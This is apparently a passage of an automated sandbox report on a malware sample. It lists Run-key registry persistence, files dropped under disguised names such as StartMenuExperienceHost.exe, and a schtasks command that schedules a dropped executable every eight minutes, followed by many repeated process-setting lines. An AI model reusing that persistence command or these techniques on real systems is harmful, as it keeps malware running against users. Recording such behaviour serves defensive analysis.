                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run upfcJump to behavior
                              Uses schtasks.exe or at.exe to add and modify task schedules
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "llflCdrMcgGBl" /sc MINUTE /mo 8 /tr "'C:\Recovery\llflCdrMcgGB.exe'" /f
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile created: C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exeJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe\:Zone.Identifier:$DATAJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile created: C:\Users\All Users\Application Data\Start Menu\55b276f4edf653Jump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run upfcJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run upfcJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run upfcJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run upfcJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run llflCdrMcgGBJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run llflCdrMcgGBJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run llflCdrMcgGBJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run llflCdrMcgGBJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHostJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHostJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHostJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHostJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 62b1bf60394248d2c743ec6df0935d58e5009c9e04aabJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 62b1bf60394248d2c743ec6df0935d58e5009c9e04aabJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 62b1bf60394248d2c743ec6df0935d58e5009c9e04aabJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 62b1bf60394248d2c743ec6df0935d58e5009c9e04aabJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run llflCdrMcgGBJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run llflCdrMcgGBJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run llflCdrMcgGBJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run llflCdrMcgGBJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run upfcJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run upfcJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOX
